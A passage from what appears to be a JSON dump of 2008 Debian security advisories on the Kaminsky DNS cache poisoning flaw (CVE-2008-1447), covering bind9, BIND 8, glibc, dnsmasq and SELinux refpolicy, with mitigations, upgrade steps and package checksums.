http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : glibc\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nCERT advisory : VU#800113\n\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS spoofing and cache poisoning attacks. Among\nother things, successful attacks can lead to misdirected web traffic\nand email rerouting.\n\nAt this time, it is not possible to implement the recommended\ncountermeasures in the GNU libc stub resolver. The following\nworkarounds are available:\n\n1. Install a local BIND 9 resoler on the host, possibly in\nforward-only mode. BIND 9 will then use source port randomization\nwhen sending queries over the network. (Other caching resolvers can\nbe used instead.)\n\n2. Rely on IP address spoofing protection if available. Successful\nattacks must spoof the address of one of the resolvers, which may not\nbe possible if the network is guarded properly against IP spoofing\nattacks (both from internal and external sources).\n\nThis DSA will be updated when patches for hardening the stub resolver\nare available.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2008-07-08T17:05:37", "published": "2008-07-08T17:05:37", "id": "DEBIAN:DSA-1605-1:9D185", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00186.html", "title": "[SECURITY] [DSA 1605-1] DNS vulnerability impact on the libc stub resolver", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-11-11T13:28:32", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1617-1 security@debian.org\nhttp://www.debian.org/security/ Devin Carraway\nJuly 25, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : refpolicy\nVulnerability : incompatible policy\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nDebian Bug : 490271\n\nIn DSA-1603-1, Debian released an update to the BIND 9 domain name\nserver, which introduced UDP source port randomization to mitigate\nthe threat of DNS cache poisoning attacks (identified by the Common\nVulnerabilities and Exposures project as CVE-2008-1447). The fix,\nwhile correct, was incompatible with the version of SELinux Reference\nPolicy shipped with Debian Etch, which did not permit a process\nrunning in the named_t domain to bind sockets to UDP ports other than\nthe standard 'domain' port (53). The incompatibility affects both\nthe 'targeted' and 'strict' policy packages supplied by this version\nof refpolicy.\n\nThis update to the refpolicy packages grants the ability to bind to\narbitrary UDP ports to named_t processes. When installed, the\nupdated packages will attempt to update the bind policy module on\nsystems where it had been previously loaded and where the previous\nversion of refpolicy was 0.0.20061018-5 or below.\n\nBecause the Debian refpolicy packages are not yet designed with\npolicy module upgradeability in mind, and because SELinux-enabled\nDebian systems often have some degree of site-specific policy\ncustomization, it is difficult to assure that the new bind policy can\nbe successfully upgraded. To this end, the package upgrade will not\nabort if the bind policy update fails. The new policy module can be\nfound at /usr/share/selinux/refpolicy-targeted/bind.pp after\ninstallation. Administrators wishing to use the bind service policy\ncan reconcile any policy incompatibilities and install the upgrade\nmanually thereafter. A more detailed discussion of the corrective\nprocedure may be found here:\n\n http://wiki.debian.org/SELinux/Issues/BindPortRandomization\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 0.0.20061018-5.1+etch1. The unstable distribution (sid) is\nnot affected, as subsequent refpolicy releases have incorporated an\nanalogous change.\n\nWe recommend that you upgrade your refpolicy packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/r/refpolicy/refpolicy_0.0.20061018.orig.tar.gz\n Size/MD5 checksum: 571487 1bb326ee1b8aea1fa93c3bd86a3007ee\n http://security.debian.org/pool/updates/main/r/refpolicy/refpolicy_0.0.20061018-5.1+etch1.diff.gz\n Size/MD5 checksum: 53515 bd171f0cfa9adc59d451d176fb32c913\n http://security.debian.org/pool/updates/main/r/refpolicy/refpolicy_0.0.20061018-5.1+etch1.dsc\n Size/MD5 checksum: 859 52bc8ea0cab864e990e9dacc4db3b678\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/r/refpolicy/selinux-policy-refpolicy-strict_0.0.20061018-5.1+etch1_all.deb\n Size/MD5 checksum: 1541610 626c93fc13beaa01ff151d9103a7860b\n http://security.debian.org/pool/updates/main/r/refpolicy/selinux-policy-refpolicy-doc_0.0.20061018-5.1+etch1_all.deb\n Size/MD5 checksum: 289230 b082a861eda93f9bc06dd2e2f03ba89d\n http://security.debian.org/pool/updates/main/r/refpolicy/selinux-policy-refpolicy-targeted_0.0.20061018-5.1+etch1_all.deb\n Size/MD5 checksum: 1288314 c00ed4f0ea4ddbb8dd945c24c710c788\n http://security.debian.org/pool/updates/main/r/refpolicy/selinux-policy-refpolicy-src_0.0.20061018-5.1+etch1_all.deb\n Size/MD5 checksum: 595490 841f616c8f08b22ed7077c21c1065026\n http://security.debian.org/pool/updates/main/r/refpolicy/selinux-policy-refpolicy-dev_0.0.20061018-5.1+etch1_all.deb\n Size/MD5 checksum: 418666 bee3f41fe8771b7b88693937814494a3\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2008-07-25T06:29:42", "published": "2008-07-25T06:29:42", "id": "DEBIAN:DSA-1617-1:2477C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00201.html", "title": "[SECURITY] [DSA 1617-1] New refpolicy packages fix incompatible policy", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T02:21:20", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1604-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 08, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : bind\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nCERT advisory : VU#800113\n\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThe BIND 8 legacy code base could not be updated to include the\nrecommended countermeasure (source port randomization, see DSA-1603-1\nfor details). There are two ways to deal with this situation:\n\n1. Upgrade to BIND 9 (or another implementation with source port\nrandomization). The documentation included with BIND 9 contains a\nmigration guide.\n\n2. Configure the BIND 8 resolver to forward queries to a BIND 9\nresolver. Provided that the network between both resolvers is trusted,\nthis protects the BIND 8 resolver from cache poisoning attacks (to the\nsame degree that the BIND 9 resolver is protected).\n\nThis problem does not apply to BIND 8 when used exclusively as an\nauthoritative DNS server. It is theoretically possible to safely use\nBIND 8 in this way, but updating to BIND 9 is strongly recommended.\nBIND 8 (that is, the bind package) will be removed from the etch\ndistribution in a future point release.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2008-07-08T17:04:04", "published": "2008-07-08T17:04:04", "id": "DEBIAN:DSA-1604-1:E1CB3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00185.html", "title": "[SECURITY] [DSA 1604-1] BIND 8 deprecation notice", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T02:22:30", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1623-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJuly 31, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : dnsmasq\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThis update changes Debian's dnsmasq packages to implement the\nrecommended countermeasure: UDP query source port randomization. This\nchange increases the size of the space from which an attacker has to\nguess values in a backwards-compatible fashion and makes successful\nattacks significantly more difficult.\n\nThis update also switches the random number generator to Dan\nBernstein's SURF.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.35-1+etch4. Packages for alpha will be provided later.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.43-1.\n\nWe recommend that you upgrade your dnsmasq package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4.dsc\n Size/MD5 checksum: 596 3834461c89e55467b4b65ed4ac209e81\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35.orig.tar.gz\n Size/MD5 checksum: 252901 ad1fafeaf3442685cfe16613e0f8b777\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4.diff.gz\n Size/MD5 checksum: 19202 4ced7768f49198bd43bbbd24f2a3d3e4\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_amd64.deb\n Size/MD5 checksum: 188278 8fb55f694db9fdfccaa86d134e937777\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_arm.deb\n Size/MD5 checksum: 181746 4caf23f31de937b817e12ade7d132eac\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_hppa.deb\n Size/MD5 checksum: 190490 66730e785683655b058d11aa70346be4\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_i386.deb\n Size/MD5 checksum: 184546 1fbdd71e81a1e05d68b0f88eaeb00b10\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_ia64.deb\n Size/MD5 checksum: 223758 011f283b71ef0f9e07d5a9dce25db505\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_mips.deb\n Size/MD5 checksum: 189846 5c67cca2eaedc1dff80c5fd05aa1d33f\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_mipsel.deb\n Size/MD5 checksum: 191824 dfd87d69a7751f1e6ef2d0f1ede052ff\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_powerpc.deb\n Size/MD5 checksum: 186890 93701abcca5421beddab015a7f35af99\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_s390.deb\n Size/MD5 checksum: 186396 6f19f6c8d803c3d57e01e73fe1e11886\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_sparc.deb\n Size/MD5 checksum: 182910 f360078c14f715e90e60124b4ede2be9\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2008-07-31T16:45:43", "published": "2008-07-31T16:45:43", "id": "DEBIAN:DSA-1623-1:F6633", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00208.html", "title": "[SECURITY] [DSA 1623-1] New dnsmasq packages fix cache poisoning", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-11-11T13:19:47", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1603-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 08, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : bind9\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nCERT advisory : VU#800113\n\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThis update changes Debian's BIND 9 packages to implement the\nrecommended countermeasure: UDP query source port randomization. This\nchange increases the size of the space from which an attacker has to\nguess values in a backwards-compatible fashion and makes successful\nattacks significantly more difficult.\n\nNote that this security update changes BIND network behavior in a\nfundamental way, and the following steps are recommended to ensure a\nsmooth upgrade.\n\n\n1. Make sure that your network configuration is compatible with source\nport randomization. If you guard your resolver with a stateless packet\nfilter, you may need to make sure that no non-DNS services listen on on\nthe 1024--65535 UDP port range and open it at the packet filter. For\ninstance, packet filters based on etch's Linux 2.6.18 kernel only\nsupport stateless filtering of IPv6 packets, and are therefore pose this\nadditional difficulty. (If you use IPv4 with iptables and ESTABLISHED\nrules, networking changes are likely not required.)\n\n2. Install the BIND 9 upgrade, using "apt-get update" followed by\n"apt-get install bind9". Verify that the named process has been\nrestarted and answers recursive queries. (If all queries result in\ntimeouts, this indicates that networking changes are necessary; see the\nfirst step.)\n\n3. Verify that source port randomization is active. Check that the\n/var/log/daemon.log file does not contain messages of the following\nform\n\n named[6106]: /etc/bind/named.conf.options:28: using specific\n query-source port suppresses port randomization and can be insecure.\n\nright after the "listening on IPv6 interface" and "listening on IPv4\ninterface" messages logged by BIND upon startup. If these messages are\npresent, you should remove the indicated lines from the configuration,\nor replace the port numbers contained within them with "*" sign (e.g.,\nreplace "port 53" with "port *").\n\nFor additional certainty, use tcpdump or some other network monitoring\ntool to check for varying UDP source ports. If there is a NAT device\nin front of your resolver, make sure that it does not defeat the\neffect of source port randomization.\n\n4. If you cannot activate source port randomization, consider\nconfiguring BIND 9 to forward queries to a resolver which can, possibly\nover a VPN such as OpenVPN to create the necessary trusted network link.\n(Use BIND's forward-only mode in this case.)\n\n\nOther caching resolvers distributed by Debian (PowerDNS, MaraDNS,\nUnbound) already employ source port randomization, and no updated\npackages are needed. BIND 9.5 up to and including version\n1:9.5.0.dfsg-4 only implements a weak form of source port\nrandomization and needs to be updated as well. For information on\nBIND 8, see DSA-1604-1, and for the status of the libc stub resolver,\nsee DSA-1605-1.\n\nThe updated bind9 packages contain changes originally scheduled for\nthe next stable point release, including the changed IP address of\nL.ROOT-SERVERS.NET (Debian bug #449148).\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 9.3.4-2etch3.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your bind9 package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3.dsc\n Size/MD5 checksum: 897 aeb15f8babb1e6e38367b9f19fea87da\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4.orig.tar.gz\n Size/MD5 checksum: 4043577 198181d47c58a0a9c0265862cd5557b0\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3.diff.gz\n Size/MD5 checksum: 302126 521abea46b1104f2251cc398f30af303\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9-doc_9.3.4-2etch3_all.deb\n Size/MD5 checksum: 189560 46ff778db82d2e171d292ecac93ea9b6\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 98154 bbdbcd3d0840f5ffcf4eaddf5a8c253f\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 1407380 ca8995875e76a25de6f32a47f62ea876\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 226088 93100774ae6da891caf9fa27a2134cdf\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 112616 bca5dcca8abff15f4f9cc911f9f94818\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 322286 677fdcf8e9a8c272a08ed47a79e09209\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 190084 87d64554a1cdde9f58cc850f7d5961a1\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 96508 48ba9fc0e884f093e95988bd4e088b9c\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 564862 7b23948d7c741d4f287698d28385ce71\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 188742 5dd8024a9864137f4529785fcc9c9231\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 116534 2e7dc9ea95bae40dc396ff504abb03bb\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 115784 b961fd6c797a2d1422ae588bfc25ed9d\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 224294 4d33744bb92300b061cad41dd8de7ea5\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 1111932 e43ced7eae496d7835247a068bef4a66\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 190742 9e39ced5d3464594b9dda6ce683fc653\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 319008 e36a35983ebc5061e8669ef7f004a851\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 552414 c93c2863bddd5661010ae3472e210aa8\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 95922 f114eb76add0d7dabad1d082d38ccf08\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 117072 a70d1d96ea01aa24fb9642e09133824f\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 187646 70372cec3522356dcd00901ea64714d4\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 111270 6dc6edfcca9fecb28c7e66d31ab14a74\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 114722 905d0f9b7b5ebc0308c54158e71d03cc\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 96704 09d3c850f12a6c1f6eab4e800a118c87\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 107888 b2ea4933e233a1af8dd1e5ee641999a2\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 112714 27b1fde9b144cacb1ae06a441d7c5787\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 116076 cafc3294083de02518ab5fe0f0488c3b\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 532206 a005bdff779fed950e4750231d0184b2\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 187364 72fdca60a20876be71b678028cefc316\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 95752 bce98b259a2821d59f6e6b441b491d77\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 182950 26a15d51a4e6f1ea1dda99ab4d3ea34c\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 217686 97f538e27ab7c765b514a9ce59869a41\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 95168 374d7f18915fc8eb6b775d272cf28f2e\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 1074498 fdada51888027e9c3e89961b31a48ded\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 311078 43d1c044b0cc81b072b8962ad3b8f019\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 96986 bba6d0a611b7088e284564b430f91405\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 97140 14f3dacd102208700660873637dea18b\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 185570 012eb78b091c0991988a95160df7d65d\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 115822 d717418b7ec770e5419e0941670eab19\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 543342 201331119c074430d503b68dc210e187\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 1258146 2f092d0708338d0a3ac8924218fee0d7\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 315070 bc8d94bec7b1c8cf80f64fb72d1f38e5\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 187942 1cd85afac13850d1807a5b50b9d3262f\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 114612 912dc2007ca7cb6097a3e6a4e98897e3\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 217378 49276452262a155ba17db2ad8c66e3e2\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 113466 428d268ce8ad5386c1af758ca4cff2ce\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 106034 ce4d4a024472317185d4c6492b7d30df\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 180292 1fd02a86a31b68a8db2407904495a0db\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 94838 9dbc2734dd8b8bb7c3e7684faabea64e\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 206330 a22fb6cb47d6e449007d665b9e6d8c52\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 113162 b9bc5fa7f96313235a53ab6fd819b58b\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 472708 9edfb07c186a93aea1a2e602e0ee6335\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 94822 d2fc00416dc090a535b280f48eee7f46\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 169930 47c43c9738afb7ed72618930dc702ed3\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 296722 dd1979969210386fc36d119e19e12cc2\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 996528 56db22ee21e053443e72ccd11a25181b\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 110134 5491e4e33e43f1300840b62947690b7a\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 232052 eb9215cb2ba71ded815b4ca6f0ac0744\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 99978 ceee4c1dc16fdf2d7fefe1aee6d8dd85\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 393324 553b67ca638482db8e1586d231f03abe\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 740264 a30c98b25296a147d47d7f44c8418883\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 127606 33d62368c2ce437e660708eb6b0ffe2b\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 216344 0a0b33f34dbeb744bd8af8ad8388048f\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 125806 3aafce71b9e4ecaf01602c409a355b54\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 1584302 d982b4443c38056cdeb80b327ee36f3a\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 117782 ae8ae735a8054ff473d305b06c90c68a\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 102432 4443f6e43cc1e4c7448965a0501bfe54\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 280866 c20244c3a06177b934ac804b382b85c7\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 174012 cf61e15aa7c79b40ae94a3c1d08ba496\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 301476 4094fd919da162322ea07d62378cc664\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 110326 be73e626902012ca986d4192804017e7\n 